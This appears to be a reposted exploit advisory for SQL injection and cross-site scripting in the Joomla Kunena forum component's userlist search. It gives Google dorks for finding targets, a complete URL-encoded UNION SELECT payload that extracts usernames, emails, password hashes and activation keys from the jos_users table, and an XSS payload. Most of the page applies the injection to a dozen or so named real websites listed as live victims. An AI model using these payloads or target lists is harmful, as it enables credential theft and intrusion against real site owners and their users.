Monday, 1 April 2013

Joomla com_kunena


# Exploit Title: Joomla com_kunena - SQL Injection Vulnerability / Cross-Site Scripting
# Vendor Name: Kunena
# Url Vendor: http://www.kunena.org/
# Category: WebApps
# Type: php
# Risk: Critical
# Dork: intext:"Powered by Kunena" com_kunena func=
# Dork: inurl:index.php?option=com_kunena&
# Dork: intext:"Gracias a Kunena" com_kunena func=
# Info: This Vulnerability Affects About 70 million Websites


# Example/Sql=> http://site/index.php?option=com_kunena&func=userlist&search= [ Sql ]
# Example/Xss=> http://site/index.php?option=com_kunena&func=userlist&search= [ Xss ]

# Exploit/Comand/Sql=> %25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
# Exploit/Comand/Xss=> "><img src=x onerror=;;alert('1337') />


# Example/Real_Time
http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.oui-iohe.org/webcolam/rifge/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;


# Sample/Sql/Xss/Vulnerability
http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%'
http://pureos.org/index.php?option=com_kunena&func=userlist&search=%'
http://www.twinmos.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.vagturbo.cl/index.php?option=com_kunena&func=userlist&search=%'
http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%'
http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%'
http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%'
http://www.deandroid.com.ar/index.php?option=com_kunena&func=userlist&search=%'

# Many More in Google & Bing

# 1337day.com [2012-10-28]

